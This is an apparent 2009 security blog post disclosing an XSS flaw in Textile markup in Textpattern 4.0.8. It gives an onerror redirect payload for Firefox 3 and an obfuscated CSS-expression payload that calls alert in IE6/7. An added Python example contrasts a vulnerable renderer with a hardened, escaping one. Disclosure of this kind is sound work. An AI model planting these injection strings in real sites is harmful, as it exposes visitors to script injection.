jeffchannell.com

Textpattern 4.0.8 Textile XSS Vulnerability

Posted in PHP
2009-08-03 02:03:31 +0000 UTC
Textpattern 4.0.8, a PHP-based CMS, has a unique approach to allowing user-styled input: Textile. This BBCode-style markup lets users easily style comments. It is also vulnerable to XSS.
A few caveats:

FF3 (limited, but redirection is possible):

!http://foo.com/fake.png"/onerror="location.href='http://google.com'!

Script execution in IE6/7 (PoC; alerts 'XSS'):

!http://foo.com/fake.png"/style="xss:\\0065\\0078\\0070\\0072\\0065\\0073\\0073\\0069\\006f\\006e\\0028\\0061\\006c\\0065\\0072\\0074\\0028\\0053\\0074\\0072\\0069\\006e\\0067\\002e\\0066\\0072\\006f\\006d\\0043\\0068\\0061\\0072\\0043\\006f\\0064\\0065\\0028\\0038\\0038\\002c\\0020\\0038\\0033\\002c\\0020\\0038\\0033\\0029\\0029\\0029!
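Added illustration, not Textpattern's own code: a simplified Python model of Textile's !url! image syntax that shows why a quote inside the URL escapes the src attribute, beside a hardened renderer that validates the URL and HTML-escapes it. The regex and helper names are assumptions; the sample input is the FF3 payload quoted above.

```python
import html
import re
from urllib.parse import urlsplit

# Assumption: a minimal model of Textile's !url! image markup, not the real parser.
IMAGE_RE = re.compile(r'!([^!\s]+)!')

# Sample input taken from the post above (FF3 payload).
FF3_SAMPLE = """!http://foo.com/fake.png"/onerror="location.href='http://google.com'!"""


def render_image_vulnerable(text: str) -> str:
    """Drops the URL straight into src, so a quote in the URL closes the
    attribute and whatever follows becomes further attributes on the <img>."""
    return IMAGE_RE.sub(lambda m: f'<img src="{m.group(1)}" />', text)


def safe_image_url(url: str) -> bool:
    """Accept only http(s) URLs with a host and no characters that can reach markup."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False
    return re.search(r'["\'<>\s\\]', url) is None


def render_image_hardened(text: str) -> str:
    """Validate the URL, then escape it so it can never leave the src attribute.
    Rejected markup is rendered literally (escaped) rather than as an <img>."""
    def repl(m: re.Match) -> str:
        url = m.group(1)
        if not safe_image_url(url):
            return html.escape(m.group(0), quote=True)
        return f'<img src="{html.escape(url, quote=True)}" />'
    return IMAGE_RE.sub(repl, text)
```

Running both renderers over FF3_SAMPLE shows the vulnerable one emitting an onerror attribute while the hardened one emits no <img> tag at all.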

Timeline